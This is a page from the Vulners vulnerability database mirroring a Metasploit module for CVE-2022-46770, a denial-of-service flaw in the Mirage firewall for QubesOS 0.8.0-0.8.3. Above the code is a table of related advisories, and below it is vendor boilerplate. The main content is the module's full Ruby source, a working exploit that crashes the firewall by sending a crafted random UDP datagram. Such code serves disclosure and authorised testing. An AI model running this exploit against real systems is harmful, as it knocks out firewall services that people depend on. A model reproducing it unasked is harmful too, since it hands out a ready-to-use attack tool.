Vulners
Lucene search
Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service
🗓️ 31 Aug 2024 00:00:00Reported by Krzysztof Burghardt, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 208 Views
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | qubes-mirage-firewall v0.8.3 - Denial Of Service Exploit | 31 Mar 202300:00 | – | zdt |
 | The vulnerability of Qubes Mirage Firewall, related to the execution of a loop with an unavailable exit condition, allows a intruder to trigger a service failure. | 9 Nov 202300:00 | – | bdu_fstec |
 | CVE-2022-46770 | 7 Dec 202222:11 | – | circl |
 | MirageOS qubes-mirage-firewall 资源管理错误漏洞 | 7 Dec 202200:00 | – | cnnvd |
 | CVE-2022-46770 | 7 Dec 202200:00 | – | cve |
 | CVE-2022-46770 | 7 Dec 202200:00 | – | cvelist |
 | qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS) | 31 Mar 202300:00 | – | exploitdb |
 | Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit | 18 Jan 202319:50 | – | metasploit |
 | CVE-2022-46770 | 7 Dec 202220:15 | – | nvd |
 | OSEC-2022-01 Infinite loop in console output on xen | 7 Dec 202200:00 | – | osv |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit',
'Description' => %q{
This module allows remote attackers to cause a denial of service (DoS)
in Mirage firewall for QubesOS 0.8.0-0.8.3 via a specifically crafted UDP request.
},
'Author' => 'Krzysztof Burghardt <[email protected]>',
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2022-46770' ],
[ 'URL', 'https://mirage.io/blog/MSA03' ],
[ 'URL', 'https://github.com/mirage/qubes-mirage-firewall/issues/166' ],
],
'Notes' => {
'Stability' => [CRASH_SERVICE_DOWN],
'Reliability' => [],
'SideEffects' => [IOC_IN_LOGS]
},
'DisclosureDate' => '2022-12-04'
)
)
register_options(
[
OptAddress.new('RHOST', [ false, 'Target address (Default: random)' ]),
OptPort.new('RPORT', [ false, 'Target port (Default: random)' ]),
]
)
deregister_options('RHOSTS')
end
def run
rhost = datastore['RHOST'] || [239, 255, Random.new.rand(255), Random.new.rand(255)].join('.')
rport = datastore['RPORT'] || Random.new.rand(65535)
connect_udp(true, 'RHOST' => rhost, 'RPORT' => rport)
size = Random.new.rand(336...1472)
pkt = Random.new.bytes(size)
print_status("Sending random datagram of #{size} bytes to #{rhost}:#{rport}...")
udp_sock.put(pkt)
disconnect_udp
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 3.17.5
EPSS0.16905
SSVC